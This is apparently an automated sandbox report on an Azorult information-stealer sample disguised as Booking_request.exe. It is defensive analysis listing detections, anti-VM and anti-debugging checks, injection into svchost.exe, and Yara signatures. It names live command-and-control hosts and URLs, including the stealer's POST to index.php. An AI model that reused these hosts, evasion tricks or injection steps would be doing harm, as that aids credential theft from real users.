Loading ...

Play interactive tourEdit tour

Analysis Report Booking_request.exe

Overview

General Information

Joe Sandbox Version:28.0.0
Analysis ID:53882
Start date:24.02.2020
Start time:11:04:08
Joe Sandbox Product:Cloud
Overall analysis duration:0h 7m 6s
Hypervisor based Inspection enabled:true
Report type:full
Sample file name:Booking_request.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10x64 HVM (IE 11.1, Chrome 67, Firefox 61, Adobe Reader 18, Java 8 Update 171)
Number of analysed new started processes analysed:17
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
  • GSI enabled (Java)
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.spyw.evad.winEXE@3/0@1/1
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
  • Stop behavior analysis, all processes terminated
Warnings:
Show All
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, sc.exe, dllhost.exe, BackgroundTransferHost.exe, wermgr.exe, conhost.exe, backgroundTaskHost.exe, CompatTelRunner.exe
  • Excluded IPs from analysis (whitelisted): 52.142.119.134, 52.156.204.185, 52.229.171.202, 13.107.4.52, 13.68.93.109, 20.42.24.29, 40.91.91.94, 20.36.218.70, 2.18.68.82, 20.44.86.43, 40.90.22.190, 40.90.22.189, 40.90.22.191, 93.184.220.29, 104.18.24.243, 104.18.25.243, 40.112.91.29, 23.210.250.117, 92.122.213.194, 92.122.213.247, 52.164.221.179
  • Excluded domains from analysis (whitelisted): fe2.update.microsoft.com.nsatc.net, umwatson.trafficmanager.net, cs9.wac.phicdn.net, arc.msn.com.nsatc.net, ris-prod-atm-perf.trafficmanager.net, ocsp.msocsp.com, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, ocsp.digicert.com, login.live.com, sls.update.microsoft.com, www.msftconnecttest.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, ocsp.globalsign.cloud, fs.microsoft.com, sls.update.microsoft.com.akadns.net, settings-win.data.microsoft.com, e1723.g.akamaiedge.net, ipv4.login.msa.akadns6.net, v4ncsi.msedge.net, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, sls.emea.update.microsoft.com.akadns.net, 4-c-0003.c-msedge.net, fe2.update.microsoft.com, hostedocsp.globalsign.com, store-images.s-microsoft.com, ncsi.4-c-0003.c-msedge.net, login.msa.akadns6.net
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100Report FP / FNfalse
Azorult
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Remote ManagementWinlogon Helper DLLProcess Injection411Software Packing1Credential DumpingVirtualization/Sandbox Evasion1Application Deployment SoftwareData from Local SystemData CompressedStandard Non-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaService ExecutionPort MonitorsAccessibility FeaturesVirtualization/Sandbox Evasion1Network SniffingProcess Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Application Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesWindows Management InstrumentationAccessibility FeaturesPath InterceptionProcess Injection411Input CaptureSecurity Software Discovery311Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationCustom Cryptographic ProtocolExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingObfuscated Files or InformationCredentials in FilesSystem Information Discovery2Logon ScriptsInput CaptureData EncryptedMultiband CommunicationSIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessMasqueradingAccount ManipulationRemote System Discovery1Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Machine Learning detection for sampleShow sources
Source: Booking_request.exeJoe Sandbox ML: detected

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2029466 ET TROJAN Win32/AZORult V3.3 Client Checkin M13 192.168.2.3:49843 -> 45.147.197.20:80
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: sh1006535.had.suContent-Length: 105Cache-Control: no-cacheData Raw: 00 00 00 26 66 99 26 66 9b 42 70 9d 33 70 9d 34 70 9d 37 16 ec 26 67 ea 26 66 97 26 66 9a 26 66 9f 26 66 9a 26 66 97 26 66 9e 26 66 99 42 70 9c 47 70 9d 30 70 9d 36 70 9d 35 70 9d 30 70 9d 30 70 9d 3b 13 8b 30 6c 8b 31 11 eb 45 70 9d 31 16 e8 41 70 9d 36 70 9d 30 70 9c 47 70 9d 35 14 eb 40 70 9d 31 70 9d 33 10 ec Data Ascii: &f&fBp3p4p7&g&f&f&f&f&f&f&fBpGp0p6p5p0p0p;0l1Ep1Ap6p0pGp5@p1p3
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: sh1006535.had.su
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: sh1006535.had.suContent-Length: 105Cache-Control: no-cacheData Raw: 00 00 00 26 66 99 26 66 9b 42 70 9d 33 70 9d 34 70 9d 37 16 ec 26 67 ea 26 66 97 26 66 9a 26 66 9f 26 66 9a 26 66 97 26 66 9e 26 66 99 42 70 9c 47 70 9d 30 70 9d 36 70 9d 35 70 9d 30 70 9d 30 70 9d 3b 13 8b 30 6c 8b 31 11 eb 45 70 9d 31 16 e8 41 70 9d 36 70 9d 30 70 9c 47 70 9d 35 14 eb 40 70 9d 31 70 9d 33 10 ec Data Ascii: &f&fBp3p4p7&g&f&f&f&f&f&f&fBpGp0p6p5p0p0p;0l1Ep1Ap6p0pGp5@p1p3
Urls found in memory or binary dataShow sources
Source: svchost.exe, 00000006.00000003.586724359.0000000004DA0000.00000004.00000001.sdmpString found in binary or memory: http://195.245.112.115/index.php
Source: Booking_request.exe, 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://ip-api.com/json
Source: Booking_request.exe, 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmpString found in binary or memory: https://dotbit.me/a/

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
PE / OLE file has an invalid certificateShow sources
Source: Booking_request.exeStatic PE information: invalid certificate
Sample file is different than original file name gathered from version infoShow sources
Source: Booking_request.exe, 00000000.00000002.585333013.0000000000920000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs Booking_request.exe
Yara signature matchShow sources
Source: 00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)Show sources
Source: Booking_request.exeStatic PE information: Section: .rr ZLIB complexity 0.999912239225
Classification labelShow sources
Source: classification engineClassification label: mal100.spyw.evad.winEXE@3/0@1/1
Creates mutexesShow sources
Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\A75A074CB-9414907A-356338F9-EF2CFB53-6AEC20EB
Source: C:\Users\user\Desktop\Booking_request.exeMutant created: \Sessions\1\BaseNamedObjects\b2Zm
PE file has an executable .text section and no other executable sectionShow sources
Source: Booking_request.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads software policiesShow sources
Source: C:\Users\user\Desktop\Booking_request.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample reads its own file contentShow sources
Source: C:\Users\user\Desktop\Booking_request.exeFile read: C:\Users\user\Desktop\Booking_request.exeJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\Booking_request.exe 'C:\Users\user\Desktop\Booking_request.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
Source: C:\Users\user\Desktop\Booking_request.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exeJump to behavior
Submission file is bigger than most known malware samplesShow sources
Source: Booking_request.exeStatic file information: File size 1569992 > 1048576
PE file has a big raw sectionShow sources
Source: Booking_request.exeStatic PE information: Raw size of .rr is bigger than: 0x100000 < 0x110a00
PE file contains a mix of data directories often seen in goodwareShow sources
Source: Booking_request.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Booking_request.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Booking_request.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Booking_request.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Booking_request.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Booking_request.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
Source: Booking_request.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
PE file contains a debug data directoryShow sources
Source: Booking_request.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
PE file contains a valid data directory to section mappingShow sources
Source: Booking_request.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Booking_request.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Booking_request.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Booking_request.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Booking_request.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
PE file contains an invalid checksumShow sources
Source: Booking_request.exeStatic PE information: real checksum: 0x18086a should be: 0x189dcc
PE file contains sections with non-standard namesShow sources
Source: Booking_request.exeStatic PE information: section name: .rr

Malware Analysis System Evasion:

barindex
Checks if the current machine is a sandbox (GetTickCount - Sleep)Show sources
Source: C:\Users\user\Desktop\Booking_request.exeFunction Chain: GetTickCount - Sleep - GetTickCount
Checks if the current machine is a sandbox (GlobalMemoryStatusEx - GetDesktopWindow - CreateToolhelp32Snapshot)Show sources
Source: C:\Users\user\Desktop\Booking_request.exeFunction Chain: GlobalMemoryStatusEx - GetDesktopWindow - CreateToolhelp32Snapshot
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmpBinary or memory string: KERNEL32FRIDA-WINJECTOR-HELPER-32.EXE
Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmpBinary or memory string: USER32.DLLFRIDA-WINJECTOR-HELPER-64.EXE
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmpBinary or memory string: VBoxService.exe
Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmpBinary or memory string: qemu-ga.exe
Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmpBinary or memory string: VBoxTray.exe
Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmpBinary or memory string: VBoxTray.exeKernel32.dllKernel32GlobalMemoryStatusEx
Queries a list of all running processesShow sources
Source: C:\Users\user\Desktop\Booking_request.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Checks if the current process is being debuggedShow sources
Source: C:\Users\user\Desktop\Booking_request.exeProcess queried: DebugFlagsJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.147.197.20 80Jump to behavior
Allocates memory in foreign processesShow sources
Source: C:\Users\user\Desktop\Booking_request.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 400000 protect: page execute and read and writeJump to behavior
Injects a PE file into a foreign processesShow sources
Source: C:\Users\user\Desktop\Booking_request.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5AJump to behavior
Writes to foreign memory regionsShow sources
Source: C:\Users\user\Desktop\Booking_request.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000Jump to behavior
Source: C:\Users\user\Desktop\Booking_request.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 401000Jump to behavior
Source: C:\Users\user\Desktop\Booking_request.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 41B000Jump to behavior
Source: C:\Users\user\Desktop\Booking_request.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 41C000Jump to behavior
Source: C:\Users\user\Desktop\Booking_request.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 41D000Jump to behavior
Source: C:\Users\user\Desktop\Booking_request.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 41E000Jump to behavior
Source: C:\Users\user\Desktop\Booking_request.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2FDC008Jump to behavior
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Users\user\Desktop\Booking_request.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exeJump to behavior

Language, Device and Operating System Detection:

barindex
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Yara detected AzorultShow sources
Source: Yara matchFile source: 00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Booking_request.exe PID: 1816, type: MEMORY
Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4412, type: MEMORY
Yara detected Azorult Info StealerShow sources
Source: Yara matchFile source: 00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Booking_request.exe PID: 1816, type: MEMORY
Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4412, type: MEMORY

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Simulations

Behavior and APIs

No simulations

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Booking_request.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmpAzorultdetect Azorult in memoryJPCERT/CC Incident Response Group
  • 0x182a8:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  • 0x18908:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  • 0x19ff0:$v2: http://ip-api.com/json
  • 0x18c62:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmpJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
    00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
      00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmpAzorultdetect Azorult in memoryJPCERT/CC Incident Response Group
      • 0x964cc:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
      • 0x96b2c:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
      • 0x98214:$v2: http://ip-api.com/json
      • 0x96e86:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
      00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmpJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
        00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
          00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmpAzorultdetect Azorult in memoryJPCERT/CC Incident Response Group
          • 0x18618:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
          • 0x18c78:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
          • 0x1a360:$v2: http://ip-api.com/json
          • 0x18fd2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
          00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmpJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
            00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
              00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmpAzorult_1Azorult Payloadkevoreilly
              • 0x18878:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 ...
              • 0x12cac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
              Process Memory Space: Booking_request.exe PID: 1816JoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
                Process Memory Space: Booking_request.exe PID: 1816JoeSecurity_Azorult_1Yara detected AzorultJoe Security
                  Process Memory Space: svchost.exe PID: 4412JoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
                    Process Memory Space: svchost.exe PID: 4412JoeSecurity_Azorult_1Yara detected AzorultJoe Security

                      Unpacked PEs

                      No yara matches

                      Sigma Overview

                      No Sigma rule has matched

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Startup

                      • System is w10x64_hvm
                      • Booking_request.exe (PID: 1816 cmdline: 'C:\Users\user\Desktop\Booking_request.exe' MD5: FF17014CBB249E173309A9E1251E4574)
                        • svchost.exe (PID: 4412 cmdline: C:\Windows\System32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
                      • cleanup

                      Created / dropped Files

                      No created / dropped files found

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      sh1006535.had.su
                      45.147.197.20
                      truefalse
                        high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://sh1006535.had.su/index.phpfalse
                          high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://195.245.112.115/index.phpsvchost.exe, 00000006.00000003.586724359.0000000004DA0000.00000004.00000001.sdmpfalse
                            unknown
                            http://ip-api.com/jsonBooking_request.exe, 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmpfalse
                              high
                              https://dotbit.me/a/Booking_request.exe, 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmpfalse
                                unknown

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPCountryFlagASNASN NameMalicious
                                45.147.197.20
                                Ukraine
                                204601unknownfalse

                                Static File Info

                                General

                                File type:PE32 executable for MS Windows (GUI) Intel 80386 32-bit
                                Entropy (8bit):7.7456665998838785
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:Booking_request.exe
                                File size:1569992
                                MD5:ff17014cbb249e173309a9e1251e4574
                                SHA1:951d86a32b4c894d0c2cabef15169896ba5cc667
                                SHA256:c3d5277a4f36f225c01cc9addfc46c1d83c89806ca609235f3b7469b79a30a52
                                SHA512:711b6dc1ee18ef9c18e7e31fd671601bd8e3be2f5b940dfd7f47cb6cdb1c2a88e0c436060aed3273f6f974238bf5036e0084376c137f3f2a84076099c62b9da6
                                SSDEEP:24576:v7pp8VT33GK1K5+Kitgqw0Q8Cj983NL8afZBX+syc/fDwjxf0PUr+Or7/2va9jb:v7pp8VT33tK5+KGgqw0Q1j989L8axEtF
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9/T.XA..XA..XA..>B..XA..>D.]XA..>E..XA..0B..XA..0D..XA..0E..XA..>@..XA..X@..XA.w1H..XA..XA..XA.w1...XA.w1C..XA.Rich.XA........

                                File Icon

                                Icon Hash:34e4c4d3c1c1d4e8

                                Static PE Info

                                General

                                Entrypoint:0x432387
                                Entrypoint Section:.text
                                Digitally signed:true
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                Time Stamp:0x5E4BAD16 [Tue Feb 18 09:23:34 2020 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:6
                                OS Version Minor:0
                                File Version Major:6
                                File Version Minor:0
                                Subsystem Version Major:6
                                Subsystem Version Minor:0
                                Import Hash:7540297183c3e9767a796ad43bd5c7a0

                                Authenticode Signature

                                Signature Valid:false
                                Signature Issuer:CN=Microsoft Code Signing PCA, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                Signature Validation Error:The digital signature of the object did not verify
                                Error Number:-2146869232
                                Not Before, Not After
                                • 8/11/2017 1:11:15 PM 8/11/2018 1:11:15 PM
                                Subject Chain
                                • CN=Microsoft Corporation, OU=MOPR, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                Version:3
                                Thumbprint MD5:0F1A213D4DEFE693E7126AC57D432DBC
                                Thumbprint SHA-1:5EAD300DC7E4D637948ECB0ED829A072BD152E17
                                Thumbprint SHA-256:FB2E0C65764535337434C74236BF4A109FD96E6D392828251D95086B6FD819C7
                                Serial:33000001797C2E574E52E1CAD6000100000179

                                Entrypoint Preview

                                Instruction
                                call 220CE3B1h
                                jmp 220CD9EFh
                                mov ecx, dword ptr [ebp-0Ch]
                                mov dword ptr fs:[00000000h], ecx
                                pop ecx
                                pop edi
                                pop edi
                                pop esi
                                pop ebx
                                mov esp, ebp
                                pop ebp
                                push ecx
                                ret
                                mov ecx, dword ptr [ebp-10h]
                                xor ecx, ebp
                                call 220CD38Ah
                                jmp 220CDB50h
                                push eax
                                push dword ptr fs:[00000000h]
                                lea eax, dword ptr [esp+0Ch]
                                sub esp, dword ptr [esp+0Ch]
                                push ebx
                                push esi
                                push edi
                                mov dword ptr [eax], ebp
                                mov ebp, eax
                                mov eax, dword ptr [0045E07Ch]
                                xor eax, ebp
                                push eax
                                push dword ptr [ebp-04h]
                                mov dword ptr [ebp-04h], FFFFFFFFh
                                lea eax, dword ptr [ebp-0Ch]
                                mov dword ptr fs:[00000000h], eax
                                ret
                                push eax
                                push dword ptr fs:[00000000h]
                                lea eax, dword ptr [esp+0Ch]
                                sub esp, dword ptr [esp+0Ch]
                                push ebx
                                push esi
                                push edi
                                mov dword ptr [eax], ebp
                                mov ebp, eax
                                mov eax, dword ptr [0045E07Ch]
                                xor eax, ebp
                                push eax
                                mov dword ptr [ebp-10h], eax
                                push dword ptr [ebp-04h]
                                mov dword ptr [ebp-04h], FFFFFFFFh
                                lea eax, dword ptr [ebp-0Ch]
                                mov dword ptr fs:[00000000h], eax
                                ret
                                push eax
                                push dword ptr fs:[00000000h]
                                lea eax, dword ptr [esp+0Ch]
                                sub esp, dword ptr [esp+0Ch]
                                push ebx
                                push esi
                                push edi
                                mov dword ptr [eax], ebp
                                mov ebp, eax
                                mov eax, dword ptr [0045E07Ch]
                                xor eax, ebp
                                push eax
                                mov dword ptr [ebp-10h], esp
                                push dword ptr [ebp-04h]
                                mov dword ptr [ebp-04h], FFFFFFFFh

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x5d1940x50.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x610000xa6c7.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x17b6000x3ec8.rr
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x6c0000x2640.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x5b6b00x38.rdata
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x5b7880x18.rdata
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x5b6e80x40.rdata
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x4e0000x184.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x4ca6f0x4cc00False0.471043490432ump; DBase 3 data file6.18164838537IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .rdata0x4e0000xfa620xfc00False0.487103174603ump; data5.40686836361IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
